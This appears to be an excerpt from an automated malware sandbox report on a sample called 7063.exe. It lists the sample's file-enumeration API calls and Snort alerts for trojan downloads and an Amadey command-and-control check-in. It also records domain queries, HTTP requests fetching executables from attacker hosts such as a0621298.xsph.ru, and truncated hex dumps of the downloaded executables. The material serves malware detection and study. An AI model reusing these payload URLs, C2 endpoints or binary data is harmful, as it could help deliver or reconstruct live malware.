                          Source: C:\Users\user\AppData\Local\Temp\7063.exeCode function: 17_2_00405E40 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,PathMatchSpecA,CopyFileA,DeleteFileA,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\7063.exeCode function: 17_2_004096E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\7063.exeCode function: 17_2_00401280 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\7063.exeCode function: 17_2_00401090 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\7063.exeCode function: 17_2_00409B40 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\7063.exeCode function: 17_2_00409970 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\7063.exeCode function: 17_2_004087E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,

                          Networking:

                          barindex
                          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                          Source: TrafficSnort IDS: 2018581 ET TROJAN Single char EXE direct download likely trojan (multiple families) 192.168.2.6:49874 -> 141.8.194.74:80
                          Source: TrafficSnort IDS: 2018581 ET TROJAN Single char EXE direct download likely trojan (multiple families) 192.168.2.6:49886 -> 141.8.194.74:80
                          Source: TrafficSnort IDS: 1087 WEB-MISC whisker tab splice attack 192.168.2.6:49888 -> 185.215.113.35:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49887 -> 185.215.113.35:80
                          System process connects to network (likely due to code injection or exploit)Show sources
                          Source: C:\Windows\SysWOW64\svchost.exeDomain query: patmushta.info
                          Source: C:\Windows\explorer.exeDomain query: cdn.discordapp.com
                          Source: C:\Windows\explorer.exeNetwork Connect: 188.166.28.199 80
                          Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.47.54.36 25
                          Source: C:\Windows\explorer.exeDomain query: unicupload.top
                          Source: C:\Windows\explorer.exeNetwork Connect: 185.233.81.115 187
                          Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 8.209.67.104 443
                          Source: C:\Windows\explorer.exeNetwork Connect: 185.7.214.171 144
                          Source: C:\Windows\explorer.exeDomain query: host-data-coin-11.com
                          Source: C:\Windows\SysWOW64\svchost.exeDomain query: microsoft-com.mail.protection.outlook.com
                          Source: C:\Windows\explorer.exeDomain query: goo.su
                          Source: C:\Windows\explorer.exeDomain query: transfer.sh
                          Source: C:\Windows\explorer.exeDomain query: a0621298.xsph.ru
                          Source: C:\Windows\explorer.exeNetwork Connect: 185.186.142.166 80
                          Source: C:\Windows\explorer.exeDomain query: data-host-coin-8.com
                          Source: global trafficHTTP traffic detected: GET /3.exe HTTP/1.1Host: a0621298.xsph.ruAccept: */*
                          Source: global trafficHTTP traffic detected: GET /advert.msi HTTP/1.1Host: a0621298.xsph.ruAccept: */*
                          Source: global trafficHTTP traffic detected: GET /capibar HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Host: 185.163.204.22
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Content-Length: 132Host: 185.163.204.24
                          Source: global trafficHTTP traffic detected: GET /123.exe HTTP/1.1Host: a0621298.xsph.ruAccept: */*
                          Source: global trafficHTTP traffic detected: GET //l/f/N2z-VH4BZ2GIX1a33Fax/e946ea03b0a56043b0189e637403106a5b3aad8e HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 185.163.204.24
                          Source: global trafficHTTP traffic detected: GET /442.exe HTTP/1.1Host: a0621298.xsph.ruAccept: */*
                          Source: global trafficHTTP traffic detected: GET /443.exe HTTP/1.1Host: a0621298.xsph.ruAccept: */*
                          Source: global trafficHTTP traffic detected: GET //l/f/N2z-VH4BZ2GIX1a33Fax/4457553c06dee2e98e4f451cad0abfa16d7760a4 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 185.163.204.24
                          Source: global trafficHTTP traffic detected: GET /File.exe HTTP/1.1Host: a0621298.xsph.ruAccept: */*
                          Source: global trafficHTTP traffic detected: GET /512412.exe HTTP/1.1Host: a0621298.xsph.ruAccept: */*
                          Source: global trafficHTTP traffic detected: GET /RM.exe HTTP/1.1Host: a0621298.xsph.ruAccept: */*
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Thu, 13 Jan 2022 22:29:13 GMTContent-Type: application/x-msdos-programContent-Length: 301056Connection: closeLast-Modified: Mon, 10 Jan 2022 12:06:49 GMTETag: "49800-5d5392be00934"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 32 74 07 b2 76 15 69 e1 76 15 69 e1 76 15 69 e1 68 47 fc e1 69 15 69 e1 68 47 ea e1 fc 15 69 e1 68 47 ed e1 5b 15 69 e1 51 d3 12 e1 71 15 69 e1 76 15 68 e1 f9 15 69 e1 68 47 e3 e1 77 15 69 e1 68 47 fd e1 77 15 69 e1 68 47 f8 e1 77 15 69 e1 52 69 63 68 76 15 69 e1 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 d4 e8 62 5f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 1e 01 00 00 f6 03 00 00 00 00 00 9f 2d 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 20 05 00 00 04 00 00 a7 ea 04 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b0 65 01 00 50 00 00 00 00 00 04 00 b0 10 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 32 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 59 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 01 00 ac 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c5 1d 01 00 00 10 00 00 00 1e 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 44 3f 00 00 00 30 01 00 00 40 00 00 00 22 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 58 84 02 00 00 70 01 00 00 24 02 00 00 62 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 10 01 00 00 00 04 00 00 12 01 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Thu, 13 Jan 2022 22:29:17 GMTContent-Type: application/x-msdos-programContent-Length: 327680Connection: closeLast-Modified: Thu, 13 Jan 2022 22:29:02 GMTETag: "50000-5d57e369a77dd"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 25 6c 2c 39 61 0d 42 6a 61 0d 42 6a 61 0d 42 6a 7f 5f d7 6a 7c 0d 42 6a 7f 5f c1 6a e2 0d 42 6a 7f 5f c6 6a 4f 0d 42 6a 46 cb 39 6a 62 0d 42 6a 61 0d 43 6a e8 0d 42 6a 7f 5f c8 6a 60 0d 42 6a 7f 5f d6 6a 60 0d 42 6a 7f 5f d3 6a 60 0d 42 6a 52 69 63 68 61 0d 42 6a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 c8 2c 8f 5f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 20 01 00 00 5c 04 00 00 00 00 00 60 33 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 80 05 00 00 04 00 00 77 8a 05 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 88 80 01 00 28 00 00 00 00 a0 04 00 88 dc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 31 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 88 73 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 01 00 8c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c6 1f 01 00 00 10 00 00 00 20 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6e 59 00 00 00 30 01 00 00 5a 00 00 00 24 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 04 03 00 00 90 01 00 00 a4 02 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 88 dc 00 00 00 a0 04 00 00 de 00 00 00 22 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Thu, 13 Jan 2022 22:29:50 GMTContent-Type: application/x-msdos-programContent-Length: 905216Connection: closeLast-Modified: Thu, 13 Jan 2022 15:53:07 GMTETag: "dd000-5d578aeb4049d"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8b cf 9c fb cf ae f2 a8 cf ae f2 a8 cf ae f2 a8 d1 fc 67 a8 d3 ae f2 a8 d1 fc 71 a8 49 ae f2 a8 d1 fc 76 a8 e1 ae f2 a8 e8 68 89 a8 cc ae f2 a8 cf ae f3 a8 45 ae f2 a8 d1 fc 78 a8 ce ae f2 a8 d1 fc 66 a8 ce ae f2 a8 d1 fc 63 a8 ce ae f2 a8 52 69 63 68 cf ae f2 a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 cf 5b b6 5f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 20 01 00 00 32 0d 00 00 00 00 00 00 30 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 50 7c 02 00 04 00 00 e4 71 0e 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 58 66 01 00 28 00 00 00 00 70 0d 00 20 cd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 31 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 59 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 01 00 88 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 13 1e 01 00 00 10 00 00 00 20 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 22 3f 00 00 00 30 01 00 00 40 00 00 00 24 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 38 fe 0b 00 00 70 01 00 00 9e 0b 00 00 64 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 20 dd 6e 02 00 70 0d 00 00 ce 00 00 00 02 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Thu, 13 Jan 2022 22:29:58 GMTContent-Type: application/x-msdos-programContent-Length: 373760Connection: closeLast-Modified: Wed, 12 Jan 2022 08:30:43 GMTETag: "5b400-5d55e62ba577e"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 6c cb d2 55 28 aa bc 06 28 aa bc 06 28 aa bc 06 36 f8 29 06 31 aa bc 06 36 f8 3f 06 57 aa bc 06 0f 6c c7 06 2b aa bc 06 28 aa bd 06 f5 aa bc 06 36 f8 38 06 11 aa bc 06 36 f8 28 06 29 aa bc 06 36 f8 2d 06 29 aa bc 06 52 69 63 68 28 aa bc 06 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 61 a2 52 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 09 00 00 c2 04 00 00 76 12 00 00 00 00 00 40 a1 02 00 00 10 00 00 00 e0 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 80 17 00 00 04 00 00 e2 26 06 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 94 be 04 00 28 00 00 00 00 b0 16 00 10 7b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 17 00 14 1d 00 00 80 13 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 8f 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 38 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e8 c1 04 00 00 10 00 00 00 c2 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 bc 9f 11 00 00 e0 04 00 00 18 00 00 00 c6 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 67 69 7a 69 00 00 00 05 00 00 00 00 80 16 00 00 02 00 00 00 de 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 75 72 00 00 00 00 ea 00 00 00 00 90 16 00 00 02 00 00 00 e0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 77 6f 62 00 00 00 00 93 0d 00 00 00 a0 16 00 00 0e 00 00 00 e2 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 10 7b 00 00 00 b0 16 00 00 7c 00 00 00 f0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 34 46 00 00 00 30 17 00 00 48 00 00 00 6c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: openrestyDate: Thu, 13 Jan 2022 22:30:04 GMTContent-Type: application/octet-streamContent-Length: 356864Last-Modified: Thu, 13 Jan 2022 20:50:05 GMTConnection: keep-aliveETag: "61e0907d-57200"Expires: Thu, 20 Jan 2022 22:30:04 GMTCache-Control: max-age=604800Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 fd 75 73 5a 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 02 32 00 12 01 00 00 5c 04 00 00 00 00 00 00 10 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 b0 05 00 00 04 00 00 00 00 00 00 03 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6c 71 01 00 c8 00 00 00 00 90 01 00 f4 15 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 74 01 00 3c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 63 6f 64 65 00 00 00 7e 38 00 00 00 10 00 00 00 3a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 74 65 78 74 00 00 00 42 d6 00 00 00 50 00 00 00 d8 00 00 00 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 a8 33 00 00 00 30 01 00 00 34 00 00 00 16 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 8c 17 00 00 00 70 01 00 00 12 00 00 00 4a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f4 15 04 00 00 90 01 00 00 16 04 00 00 5c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: openrestyDate: Thu, 13 Jan 2022 22:30:10 GMTContent-Type: application/octet-streamContent-Length: 357376Last-Modified: Thu, 13 Jan 2022 19:33:07 GMTConnection: keep-aliveETag: "61e07e73-57400"Expires: Thu, 20 Jan 2022 22:30:10 GMTCache-Control: max-age=604800Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 fd 75 73 5a 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 02 32 00 12 01 00 00 5e 04 00 00 00 00 00 00 10 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 b0 05 00 00 04 00 00 00 00 00 00 03 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6c 71 01 00 c8 00 00 00 00 90 01 00 44 16 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 74 01 00 3c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 63 6f 64 65 00 00 00 7e 38 00 00 00 10 00 00 00 3a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 74 65 78 74 00 00 00 42 d6 00 00 00 50 00 00 00 d8 00 00 00 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 a8 33 00 00 00 30 01 00 00 34 00 00 00 16 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 8c 17 00 00 00 70 01 00 00 12 00 00 00 4a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 44 16 04 00 00 90 01 00 00 18 04 00 00 5c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 